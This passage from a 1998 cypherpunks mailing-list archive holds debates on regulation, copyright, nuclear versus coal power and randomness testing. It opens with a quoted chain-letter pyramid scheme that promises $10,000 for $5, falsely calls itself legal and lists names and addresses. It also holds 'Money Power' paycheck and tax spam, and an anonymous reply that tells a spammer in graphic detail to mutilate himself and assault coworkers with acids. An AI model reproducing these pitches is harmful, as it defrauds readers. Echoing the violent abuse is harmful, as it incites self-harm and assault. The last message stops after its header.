>Follow the simple instructions and in TWO WEEKS you will have US $10,000
>in your bank account!!! Because of the LOW INVESTMENT, SPEED and HIGH
>PROFIT POTENTIAL, this program has a VERY HIGH RESPONSE RATE. JUST
>ONE (1) US$5.00 BILL. THAT'S YOUR INVESTMENT!
>
>+------+ Follow These Simple Instructions +------+
>
>1. On a blank sheet of paper write "Please add me to your mailing list."
>Write your name and address clearly and include your Email address (if
>you have one) for future mailings and courtesy follow ups. Fold it
>around a US $5 bill and send this to the FIRST name on the list (#1).
>Only the FIRST PERSON on the list gets YOUR NAME AND A FIVE DOLLAR
>GIFT.
>
>Note: This is a service and is 100% legal (Refer to US Postal & Lottery
>Laws, Title 18, Sections 1302 and 1341 or Title 18, Section 3005 in the
>US Code, also in the Code of Federal Regulations, Volume 16, Sections
>255 and 436, which state that "a product or service must be exchanged
>for money received.")
>
>2. Retype the list ONLY, REMOVING the FIRST (#1) NAME FROM THE LIST.
>Move the other two names UP and ADD YOUR NAME to the list in the
>THIRD(#3) position.
>
>3. Send out 20 copies of this letter. Note: By sending this letter via
>Email, the response time is much faster and you save the expense of
>envelopes, stamps, and copying services. Consider this, MILLIONS of
>people "surf the Internet" everyday, all day, all over the World! FIFTY
>THOUSAND new people get on the Internet every month! An excellent
>source of names is the people who send you other programs, and the names
>listed on the letter they send you. Your contact source is UNLIMITED.
>It boggles my mind to think of all the possibilities! Mail, or should I
>say Email, your letter TODAY! It's so easy,
>ONE HOUR of your time. THAT'S IT!
>
>To send your newsletter by Email:
>
>1. Go to "Edit" and "Select All"
>2. Go to "Edit" and "Copy"
>3. Start (compose) a new Email message
>4. Address your Email and Subject Blocks
>5. Go to "Edit" and "Paste"
>
>After you have pasted this article in your new Email, delete the old
>header and footer (Subject, Date, To, From, Etc..). Now you can edit
>the names and addresses with ease. I recommend deleting the top name,
>adding your name and address to the bottom of the list, then simply
>changing the numbers.
>
>THERE IS NOTHING MORE TO DO. When your name reaches the first position
>in a few days, it will be your turn to collect your gifts. The gifts
>will be sent to you by 1,500 to 2,000 people like yourself, who are
>willing to invest US$5.00 and one hour to receive US$10,000 in cash.
>That s all! There will be a total of US$10,000 (or more) in US$5.00
>bills in your mailbox in two weeks.
>US$10,000 for an hour's work! I think it s WORTH IT, don t you?
>
>GO AHEAD -- TRY IT. IT'S US$5.00! EVEN IF YOU JUST MAKE 3 OR 4
>THOUSAND, WOULDN'T THAT BE NICE?! IF YOU TRY IT, IT WILL PAY!!!!
>
>--------TRUE STORY--------
>
>Cindy Allen writes: I ran this gift summation four times last year.
>The first time I received over $7,000 in cash in less than two weeks and
>over $10,000 in cash in the next three times I ran it. I can't begin to
>tell you how great it feels not to have to worry about money anymore!
>I thank God for the day I received this letter! It has truly changed my
>life! Don t be afraid to make gifts to strangers, they'll come back to
>you ten-fold. So, let's keep it going and help each other in these "tough
>and uncertain times."
>
>Many of us just want to pay off our bills, buy a new car or buy a new
>home for our family. Whatever your reasons or needs are, this program
>worked for Cindy and thousands of others (just like you and I) time and
>time again! THIS PROGRAM CAN AND WILL WORK FOR YOU!!!
>
>--------Can I Do It Again? --------
>
>OF COURSE YOU CAN...This plan is structured for everyone to send only
>twenty(20) letters each. However, you are certainly not limited to
>twenty. Mail out as many as you can. Every twenty letters you send has
>a return to you of $10,000 or more. If you can mail forty, sixty,
>eighty, or whatever, GO FOR IT! THE MORE YOU PUT INTO IT, THE MORE YOU
>GET OUT OF IT!
>
>Each time you run this program, just follow the steps (1) through (3)
>and everyone on your gift list benefits! Simple enough? You bet it is!
>Besides, there are no mailing lists to buy (and wait for), no further
>trips to the printer or copiers, and you can do it again and again with
>your regular group of gifters, or start up a new group. Some people
>produce a mailing list of opportunity seekers and send out 200 or more.
>Why not? It beats working! Each time you receive a MLM offer in the
>mail, respond with THIS letter! Your name will climb to the number one
>position at dizzying geometric rates.
>
>Follow the simple instructions and above all, please "PLAY FAIR."
>
>That's the key to this program's success. Your name must run the "full
>gamut" on the list to produce the end results. "Sneaking" your name
>higher up on the list WILL NOT produce the results you think, and it
>only cheats the other people who have worked hard and earned the right
>to be there. So please, play by the rules and the $$,$$$ will come to
>you!!!
>
>--------Mail Your Letters Out Today--------
>
>$$$ TOGETHER, WE WILL ALL PROSPER $$$
>
>Mail your US$5.00 "Gift" to the first name on the list ONLY. Remove the
>first name and move the other two up one place and put your name in the
>#3 position.
>
>GOOD LUCK!!!
>
>
>************************************************************************
>
>1. G.U
>PO Box 1437
>Monterey Park, CA 91754
>
>2. Jorge S.
>40 Newport Pkwy
>Apt. 214
>Jersey City, NJ 07310 
>
>3. Sun Prod
>1350 E. Flamingo Rd. suite #426
>Las Vegas, NV  89119   
>
>*******************************************************************
>Remember your total cost for participation is only $5.32
>$5 gift and 32 cent stamp to mail it. Email this today to people
>that need an extra income fast.....thanks.
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Fri, 2 Oct 1998 03:41:42 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: importance of motivation (Re: EduFUD: Computers, software can harm emotional, social development)
In-Reply-To: <199810012036.VAA09025@server.eternity.org>
Message-ID: <000701bdede1$952200a0$3d8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



Regarding ADD and difficulties with attention spans:

another problem with the typical public educational system method of presenting information, is that
it is begun from an abstract level, with very little contact with the concrete things from which the
higher-level concepts were derived.   Since a neophyte in the world hasn't yet developed their
mental database, this means that they mostly have to imagine what a teacher is talking about in
order to "get it", in order to remember it, in order to disgorge it back on command.

Besides this, the information is not presented in a context where the significance of it (a math
problem, for instance) is apparent to the student, i.e. why are we studying this, why should I
strain myself over this?  Very little of the activity involved in the understanding of things is
done with due respect to the student's choice in the matter, to whether they  have developed any
personal interest in the subject, so this then is another element eliminated from the learning
environment - respect, along with reality.

It is no wonder that some children would fail to respond to the attempts to "educate" them, or that
they would fail to display the desired level of interest, or else that they respond with equal
disrespect and inattention.

This could explain ADD/ADHD to some extent, and it probably would yield important insights for
someone to examine their own true motivations when they have problems concentrating or paying
attention.

And there certainly seems to be a significant number of cpunks who claim to have this 'syndrome'.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 2 Oct 1998 04:27:15 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284728@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> > When I talk of a free market I mean Laissez Faire Capitalism, 
> > not Anarcho-Capitalism.
> 
> What's the specific difference?

I cannot claim to be an expert on anarcho-capitalism, but the
fundamental difference is Laissez Faire Capitalists believes in limited
government. The primary role of government being the abolition of
coercive force, the protection of intellectual property, and running or
overseeing of what can absolutely be justified as a natural monopoly
(e.g. military defense, sewer, local roads, etc).

Anarcho-capitalism on the other hand believes in no government (anarchy)
and that social institutions and co-ops will assume any functions that a
government would have had. Some believe that people and organizations
will independently prevent force will others believe in a competitive
free market for force and protection.

In either case there is no government interference in free trade (except
LF would prohibit Assassination Politics (AP) and similar).

> In what way are the resulting markets different from
> either the producers or consumers view?

Views on intellectual property and the obvious marketplace changes due
to an IP or lack of IP framework would be the major difference IMHO. I
cannot currently justify no intellectual property rights taken to an
extreme, and then you have the contradiction of force within the
framework of commerce.

> Explain further what you mean by abolition of force is a 
> prerequisite please.

Basically no person (or entity) can use force (or its derivatives)
against another person (or entity). Your long history of criminal law,
except stripped of all victimless crimes.

> And what specificaly do you mean by proper role of government?

"What, then, is law? It is the collective organization of the individual
right to lawful defense. 

Each of us has a natural right--from God--to defend his person, his
liberty, and his property. These are the three basic requirements of
life, and the preservation of any one of them is completely dependent
upon the preservation of the other two. For what are our faculties but
the extension of our individuality? And what is property but an
extension of our faculties? 

If every person has the right to defend -- even by force -- his person,
his liberty, and his property, then it follows that a group of men have
the right to organize and support a common force to protect these rights
constantly. Thus the principle of collective right -- its reason for
existing, its lawfulness -- is based on individual right. And the common
force that protects this collective right cannot logically have any
other purpose or any other mission than that for which it acts as a
substitute. Thus, since an individual cannot lawfully use force against
the person, liberty, or property of another individual, then the common
force -- for the same reason -- cannot lawfully be used to destroy the
person, liberty, or property of individuals or groups. 

Such a perversion of force would be, in both cases, contrary to our
premise. Force has been given to us to defend our own individual rights.
Who will dare to say that force has been given to us to destroy the
equal rights of our brothers? Since no individual acting separately can
lawfully use force to destroy the rights of others, does it not
logically follow that the same principle also applies to the common
force that is nothing more than the organized combination of the
individual forces? 

If this is true, then nothing can be more evident than this: The law is
the organization of the natural right of lawful defense. It is the
substitution of a common force for individual forces. And this common
force is to do only what the individual forces have a natural and lawful
right to do: to protect persons, liberties, and properties; to maintain
the right of each, and to cause justice to reign over us all."

from _The Law_, by Frederick Bastiat

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 2 Oct 1998 04:44:12 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284729@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> See above examples. Hell, take a look at the wet pet food 
> market now for a perfect example of why non-regulation is 
> a bad thing and why liability and other such buzz words 
> don't work in the real world.

One thing that has changed fundamentally in the Information Age is the
ability for the consumer to get informed -- the ease if information
publishing and retrieval and the inability to control it. Reputation has
more value then ever. If anything the government should insure
information disclosure (and enforce laws against fraud). Don't prohibit
transactions, let the consumer decide. For example the market will place
a value on FDA approval, whether individuals will pay more for or only
consume FDA approved items, whether insurance will cover non-approved
items, etc (and the FDA should be funded fully by evaluation fees, it
simply becomes a sort of brand, it sells reputation).

Government cannot protect people from their own decisions, and should
not have the right to take those decisions away.

I wouldn't eat at McDonalds even with all the regulation.

More often than not regulation is a false sense of security, and often
protects companies from legitimate liability (although god knows our
liability/tort system is completely out of whack).

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 1 Oct 1998 20:55:47 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810020148.DAA30780@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Hettinga Bostoned:

>True enough. The water runs off the mountains *into* most of Death Valley,
>not *out* of it.

The Totos > Todt

An experience not to be missed is walking on the boiling water that 
collects at the lowest hottest point of the US. The encrusted mineral 
deposits left as the moisture evaporates create a hurricanic wreckcape 
of razor sharp crystals and suffocating stench in 120-degree+ summer 
heat -- yourself abarbeque.

Not far away is where rocks moonwalk across the flat landscape, 
leaving astronautic tracks of their movement which has not yet been 
explained by NASA investigators, all unawares pancaked by their 
implacable specimens heading home for Jupiter.

Then there's the nearby location where earth's gravity is not 
perpendicular, and all vegetation is angled exactly to fit the cant. 
When you step into the gavitational field you tip like Pisa's Tower 
obeying the pull. Some learned idiots say this is due to undergound 
deposits of metallic ore or a chunk of Mars. (There are several 
such sites around the US, one the Pentagon Parking Lot East,
where the levitators worked the 1969 liftoff).

All this perfectly tunes in to crypto channel because it is from 
Death Valley that our film crew returned today from shooting the 
Toto Family, not CJ's family but the band of creatures who gypsy
under The Toto Mantle (TTM).

Yes, they are ghoulish beyond ancestor-vulgar Pacific Rim 
loathsome, but that is not what cracked up us TransAtlanticists. 
It was watching the whole crew of TTMs simultaneously, in 
concert, keening and hair strumming, produce encrypted text, 
each contributing algorithmicly single alpha numerical digits, 
plink A, plonk 2, plunk %, in perfect signed PGP, bypassing 
incluement grammatical plaintext, EZ-guessable PWs and 
crackerjacktoy keys to issue pure incomprehensibility which 
could be instantaneously decrypted by an incomprehending 
viewer barechest-lathered with Death Valley Vapor Rub(DVVR)
(TM-TTM).

There is this, too. Each TM-TTM rubber descoda was genuine, 
authentic, narcotic,  immimicable, that is certain from the Radiant 
Glow of Ego ID Superego Transcendence that erases the 
codebarer barefooting meatslicing mineral deposits, bareback 
riding walking rocks, bare-ass leaning into the fully exposed 
future disclosed in the deathseeking porno-crypto-graphy of 
The Totos > Todt (TT>T).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@unicorn.com
Date: Fri, 2 Oct 1998 06:12:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: copyright at the point of a gun (fwd)
Message-ID: <907326747.18477.193.133.230.33@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@EINSTEIN.ssz.com> wrote:

>> Judging by the state of software-piracy with PC software with 80-90%+
>> piracy rates, the market is already pretty much ok with ignoring
>> copyright, and would be happy to have no copyrights.

>So long as it isn't money your taking out of their pocket. There is an
>obvious double standard at play in the piracy issue.

Personally I get paid pretty well for writing software that's given away
for free. Why? Because it sells our hardware, and hardware is much, much
harder to copy than software (not to mention that the vast majority of
sales are made in the first two or three months after releasing a new
chip when a cloner would still be trying to get their silicon up and
running).

OTOH I just paid good money for a Linux CD. Why, when it's all free on
the Web? Because it contains a full consistent set of software, ready
compiled, and the time I'd spend hunting down all those packages by
myself is far more valuable than the cost of the CD. The same could be
said to apply to many of the other software packages I've bought in the
past; yes, in theory I could copy them, but I don't know anyone who has
a copy, so it would take longer to hunt it down for free than to pay for
it up front.

Software copyright really only benefits big companies like Microsoft. There
are good reasons for buying software from other companies even if there
was no copyright enforcement at gunpoint.

    Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Fri, 2 Oct 1998 05:30:13 +0800
To: Cypherpunks <petro@playboy.com>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8476@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> Petro[SMTP:petro@playboy.com] wrote: 
> Sent: 	01 October 1998 21:23
> 
>>I'm afraid sir, that your ingonorance is showing.  Pick up any college
>>(hell, high school) ecomonics textbook.  Certain types of businesses are
>>inheritly advantagious to monopolies.  The electric company is the classic
> >>example- their is no cost effective way for an electric company to
> supply
> >>power to a given area unless it is a monopoly.  Certain types of
> businesses
> >>are suited to certain types of competition, and, unregulated, monopolies
> >>are exactly what you get.  This was exactly the situation that occured
> at
> >>the turn of the century and it happened because regulation was
> >>non-existant!  Your statement is wonderfully trite but I see no evidence
> to
> >>support it.
> 
>	I'd suggest you go back to school and think a bit.In most places
>the "Electric Company" is a goverment sponsored and deligated monopoly.
>Competition is prohibited by REGULATION. This also occurs with Gas, Water,
>Telephone, especially Non-commercial, cable, and in some places Garbage
>disposal.

Nonsense. Most of those businesses became monopolies - or local monopolies -
in the relatively unregulated 1880-1914 period.  In some of them - like rail
or oil in the USA - governments introduced regulation to *force*
competition.  In UK over the last 30 years government  has  used a thing
called the "Monopolies and Mergers Commission" to investigate & (very
occasionally) break up monopolies or cartels. Government introduced
regulation to stop BT selling some products in order to allow competion to
grow. Recently government has forcibly broken up gas supply monopolies in
this country.  

I don't believe there are that many natural monopolies  Where there *are*
natural monopolies it is because the entry cost is higher than any likely
profit. Obvious case is water. It would cost you a hell of a lot to
guarantee water supply to my street in London without using the existing
infrastructure. Probably hundreds of millions of pounds.  I pay less than a
hundred pounds a year for my water. Natural monopoly.

What happens much more often is that one company becomes dominant and then
uses money to undersell rivals. Or even buy them up. Maybe even pay more for
them  It seems to be a common personality characteristic of people who run
big companies that they want to run even bigger ones. The worst enemy of
small business is big business. Now, if you wanted to say that in most
countries big business and government had their hands in each others pockets
I'd agree with you. But sometimes governments realise that monopolies are
bad - or the voters tell them that monopolies are bad - and they introduce
regulation to enforce competition.

Some other problems  - in some businesses (like oil)  the capital investment
required is so large that although there is no natural monopoly the players
ahve to be big. It might even be that there are some business (long-distance
airlcraft?) where the natural number of players in the world market is 1  -
there just aren't enough customers to justify 2 companies making the
investment (which is maybe why European governments stepped in to create
Airbus). 

Garbage (what we call rubbish over here) collection  is different again.
It's not at all a nutural monopoly and there is nothing stopping anyone
offering to do it as a business. But it is a natural for social ownership,
not private ownership. The trouble with rubbish is that I want  my
*neighbour's* rubbish to be collected as well as my own. I can pay for mine,
but what if he can't pay for his? (Like what if he is an unemployable
alcoholic, with severe Tourette's syndrome who stands on street corners for
sometimes 24 hours at a stretch, singing old soul and gospel songs,  yelling
and screaming at anyone who comes close,  and drinking can after can of
cheap beer to calm himself down enough so he can get some sleep?). I don't
want his rubbish on my street. The easiest way to arrange that is for the
majority who want rubbish collection to band together to pay for it for
everybody. And the easiest way to arrange that is through tax and local
government.

Same applies to education - I might be able to pay for my daughter to go to
school but we want everybody else's kids to go to school as well because my
life is better if they do. So we pay for it through tax.

If I don't watch out this will turn into a list of the 6 reasons why, even
though private business is nearly always more efficient,  *some* enterprises
need to be publically owned. 

Ken Brown (usual disclaimer - nothing to do with my employers)


> --
> petro@playboy.com----for work related issues. I don't speak for Playboy.
> petro@bounty.org-----for everthing else.      They wouldn't like that.
>                                               They REALLY
> Economic speech IS political speech.          wouldn't like that.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 2 Oct 1998 01:38:55 +0800
To: abuse@usa.net
Subject: Increase Your Paycheck Next Week
Message-ID: <cf56b14d8d30642e9605815124b968f3@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Hello, asshole:

I'd just like to suggest that you fuck yourself with a large metal hook in
all bodily cavities. As you are bleeding out, pour 12M nitric acid in your
wounds and feel the burn. If you are still conscious, superglue your little 
finger in a centrifuge and turn it on at maximum speed. If you are still
conscious, stick your head into a liquid nitrogen bath. All your coworkers
should repeat this procedure.

As an alternative, you can tie any coworkers you have up and bathe them in 
concentrated nitric acid while you shower them in NH4OH. Place your penis in
liquid nitrogen and then attempt to jack off. Finally, drink a concentrated
hydrochloric acid solution followed by concentrated sodium hydroxide
solution. In the unlikely event that you are able to do so, scream 'I AM THE
MASTER OF THE UNIVERSE!' over and over again while dancing until you pass out.

I wave to Interpol.

Hey Louis! What's shaking?

Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id MAA01379
	for cypherpunks-outgoing; Wed, 30 Sep 1998 12:03:54 -0400 (EDT)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id MAA01367
	for <cypherpunks@algebra.com>; Wed, 30 Sep 1998 12:03:48 -0400 (EDT)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.8.8) id JAA20785; Wed, 30 Sep 1998 09:07:02 -0700 (PDT)
Received: from cyberpass.net (cyberpass.net [209.75.197.3]) by sirius.infonex.com (8.8.8/8.8.8) with ESMTP id JAA20767 for <cpunks@sirius.infonex.com>; Wed, 30 Sep 1998 09:06:56 -0700 (PDT)
Received: from 152.202.71.131 (202-71-131.ipt.aol.com [152.202.71.131]) by cyberpass.net (8.8.8/8.7.3) with SMTP id JAA07148 for <cypherpunks@cyberpass.net>; Wed, 30 Sep 1998 09:08:07 -0700 (PDT)
Date: Wed, 30 Sep 1998 09:08:07 -0700 (PDT)
From: 2001files@usa.net
Message-Id: <199809301608.JAA07148@cyberpass.net>
To: cypherpunks@cyberpass.net
Reply-To: business_ideas@usa.net
Subject: Increase Your Paycheck Next Week
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Status: RO
X-Status: 


Would you like to get a pay raise next week without asking your boss?   Then this very special report, "Money Power," is for you!

If you have a regular job - not working in your own or a family business - and you get a regular paycheck, we can show you how you can give yourself a HUGE RAISE in your very next paycheck.  At least between 20% - 30% more than what you are getting now.  Yes, your paycheck will be increased substantially!

	* Example:  If your take home pay is $400 net per week, you can take home $440 - $500 the very next week and every week thereafter!

No Gimmicks!  Everything is perfectly legal.

"Money Power" is written in three parts:

	*Part I - shows you exactly what to do so you can give yourself a raise in your next paycheck.  You decide how big a pay raise you want to give yourself!

	*Part II -  shows you how to protect yourself, your family, your home, and your assets without paying big money -- just $85 per year to legally protect your liability 100% against bill collectors and debts.

	*Part III - shows you how you can legally deduct household expenses - utilities, gardener, supplies, repairs, and more from your income taxes.  Absolutely No Gimmicks!  Everything is legal.

This is NOT a "get rich quick" scheme or some other scam.  We are sure you have seen lots of them.  And this is NOT a "tax protester" who refuses to pay income taxes.  The author of this report pays taxes every year - of course, as little as legally possible.  It's our opinion it is not good to zero out completely.  But, you can - it's your choice.

Using the methods in this report, the rich become richer.  And poor people become poorer when they don't take advantage of these techniques.  Your chances of being audited by the IRS - just for using these methods - are near zero.

	* We are so sure "Money Power" will work for you, here is our risk-free guarantee.  If you don't get at least 100 times more money in your paycheck in one year than the cost of this report, we will double your money back!  How's that for a guarantee?
                      ---------------------------------

Now, here's one more offer you will find hard to refuse.  We have a Reseller Program whereby you can make money selling this report.  When you purchase "Money Power," you will also get 1,000 FREE places to advertise on the Internet!  If you want to make some extra money - $500, $1,000 or more - just post ads on those sites and have the orders come to you.  For every order you send us, we will pay you $5.00:
	*You don't need a merchant account to process orders!  We do that.
	*You don't have to warehouse any inventory!  We do that.
	*You don't have to ship any merchandise.  We do that.
All you have to do is send us the orders.  We'll process checks, money orders, and credit cards and we will pack and mail the report.  And you get paid twice a month - on the 15th and the 30th!
                     ------------------------------------



And, listen.  America is a free country.  If you don't want an increase in your paycheck, that's fine.  And if you don't want to know how to protect your family, that's OK, too.  And if you don't want to save money on taxes, that's quite all right.  You are living in a free country.

But, if you need money - more money in your paycheck, act right now!  

The author of this report used to work for Corporate America earning over $100,000 a year.  After paying almost 40% in Federal taxes, 6.2% for Social Security, 1.45% for Medicare, 1.5% for the unemployment fund, and 3% for his employee benefits, he would bring home less than half of his yearly salary!  And then there was state income tax to pay!   He decided he had to do something so he could keep all the money!

"Money Power" is the result of the author's frustration and aggravation with the system and the research he did to change his situation.  These are methods they don't teach you in school!

It can't get much better than this.  This is a once in a lifetime opportunity because you may not receive this message again.  And you know how it is with opportunities ..... if you pass on one, you are not entitled to another for a long time.


Don't Delay!  The longer you wait to order, the longer you will wait for your raise!!!!


	>>>>>>>>>>>>> Please Note:  This report is for U.S. Citizens and Green Card holders only!  This program will not work for illegal immigrants or foreigners.<<<<<<<<<<<<

---------------------------------------------------------------------------

Here's how to order:

*****To order online, click on your reply button and type ORDER ONLINE in the subject line and we will e-mail you the online order form.

                             OR

Print out the convenient order form below NOW and mail it to:

	World Net Press
	Dept. EN-930
	P.O. Box 96594
	Las Vegas, NV 89193-6594
	
Payment Method:  
_____ Check     
_____ Money Order
_____ Visa
_____ MasterCard
_____ American Express
_____ Discover

_____ Yes, I want to order my copy of  "Money Power".  Price is $9.95 + $3.95 S/H = $13.90 and my order will be shipped by 1st Class Mail.   

Name_________________________________________________________________________

Address______________________________________________________________________

City/State/Zip_______________________________________________________________

Daytime Phone (__________)___________________________________________________

E-Mail Address_______________________________________________________________

Credit Card #_____________________________________________ Exp. Date_________

Cardholder Name (as it appears on the card)__________________________________

(Please make sure you include your phone number and e-mail address in case we have a question about your order.  Your credit card billing will reflect Road to Wealth, Inc.)



**************************************************************************
We are currently consolidating our mailing lists and need to update our database.  Our records indicate you may have inquired in the past. If this message has reached you in error, or the information is not correct, please accept our apology.  Follow the instructions below to be removed and we will honor your request.  We do not knowingly engage in spam of any kind.

Please click on your reply button and type REMOVE in the subject line only.  The software reads only the subject line, not the body of the message.
**************************************************************************

Please be advised we collect the e-mail addresses of all flamers, hackers, and users of abusive and vulgar language.  We submit these addresses to the FBI and Interpol on a monthly basis.  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Fri, 2 Oct 1998 08:53:46 +0800
To: Clifford Heath <cjh@osa.com.au>
Subject: Re: Randomness testing
In-Reply-To: <m0zOxtY-0001eoC@magpie.osa.com.au>
Message-ID: <Pine.LNX.3.96.981002073405.1244C-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 2 Oct 1998, Clifford Heath wrote:

> We have been asked by a customer if we have any tests that demonstrate 
> the randomness of the SSLeay random number generator (augmented by some
> sound-card random number seeding that we wrote).
> 
> I'd like to find some standard implementation for testing randomness, but 
> Schneier offers no help (other than a reference to Knuth Vol 2), and I
> don't know where else to turn.
> 
> I realise that cryptographic randomness requires unpredictability, and
> this quality depends upon closed-world assumptions about unknown individuals'
> predictive powers, but we have to live with that.
> 

You mean you don't have a copy of Knuth, Vol 2.  For shame!

I'm too lazy to look it up for you, but I believe the two tests
are called the Run test and the Chi-square method.

(trying to remember from my own dusty compSci memories)

jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 2 Oct 1998 06:41:13 +0800
To: cypherpunks@Algebra.COM
Subject: Re: I thought of an initialy regulated industry!...
In-Reply-To: <199810011243.HAA18113@einstein.ssz.com>
Message-ID: <199810021140.HAA19298@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:46 AM 10/1/98 -0700, Tim May wrote:

>Finally, the "environmental burden" imposed by a coal-fired power plant is
>vastly greater than that from a nuclear plant. Do the math on particulates,
>carbon levels, etc. Many libertarians have proposed better schemes for
>dealing with such environmental burdens....if fossil fuel-powered plants
>had to actually pay their share of environmental costs, they'd be even more
>expensive than nuclear.

A normally operating coal plant releases more radioactive material (carbon
14) than a normally operating nuclear plant.  The waste products from a
coal plant are not only more voluminous (though less dense) than the coal
that goes in but also contain a substance that is more poisonous than
plutonium (arsenic trioxide).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 2 Oct 1998 07:46:53 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810021246.HAA24653@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 02 Oct 1998 07:41:29 -0400
> From: Duncan Frissell <frissell@panix.com>
> Subject: Re: I thought of an initialy regulated industry!...

> A normally operating coal plant releases more radioactive material (carbon
> 14) than a normally operating nuclear plant.

The largest environment impact issue with a nuclear plant is hot water
discharge (which is much larger than the exhaust from a coal plant) and
spent fuel storage because of the amount of time that is required to
guarantee seals.

In the first place the heated water effects the ecology of the local area
and you see the ripples of this in the ecology changes for hundreds of
miles. An additional impact is that because of the water needs of plants
they are usualy located in or near wetlands which are critical to the entire
eco-cycle for thousands of miles.

The issue with storage is that it occurs on a time line that is best
described as near-geologic. Periods of time that are orders of magnitude
longer than human civilizations survive.

> coal plant are not only more voluminous (though less dense) than the coal
> that goes in but also contain a substance that is more poisonous than
> plutonium (arsenic trioxide).

Consider the difference in volume of these two waste products...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 2 Oct 1998 07:47:10 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: copyright at the point of a gun (fwd)
Message-ID: <199810021250.HAA24715@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Oct 1998 04:12:29 -0700 (PDT)
> From: mark@unicorn.com
> Subject: Re: copyright at the point of a gun (fwd) 

> >So long as it isn't money your taking out of their pocket. There is an
> >obvious double standard at play in the piracy issue.

[irrelevent material deleted]

> Software copyright really only benefits big companies like Microsoft. There

No, it also protects the little guy who writes a nifty piece of code that
lots of people want to use. 

> are good reasons for buying software from other companies even if there
> was no copyright enforcement at gunpoint.

If there was no copyright enforcement then the license agreements would be
even more draconian than they are now. Not to mention that technology as a
whole would be spread slower because companies wouldn't share it as easy as
they do now because of the protection of copyright.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Fri, 2 Oct 1998 09:22:31 +0800
To: "Vladimir Z. Nuri" <rah@shipwright.com>
Subject: RE: EduFUD: Computers, software can harm emotional, social development
In-Reply-To: <199810012307.QAA27055@netcom13.netcom.com>
Message-ID: <000501bdee0f$e0762080$982580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



While preaching to the choir, Vladimir said (among other neat stuff)
~> not all effects are positive, but it's creating a new
~> reality I vastly prefer to the old, shriveled up one.


The old, shriveled up reality!  I LOVE it!

X 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marty Levy" <rwww60@email.sps.mot.com>
Date: Fri, 2 Oct 1998 02:54:43 +0800
To: Clifford Heath <cjh@osa.com.au>
Subject: Re: Randomness testing
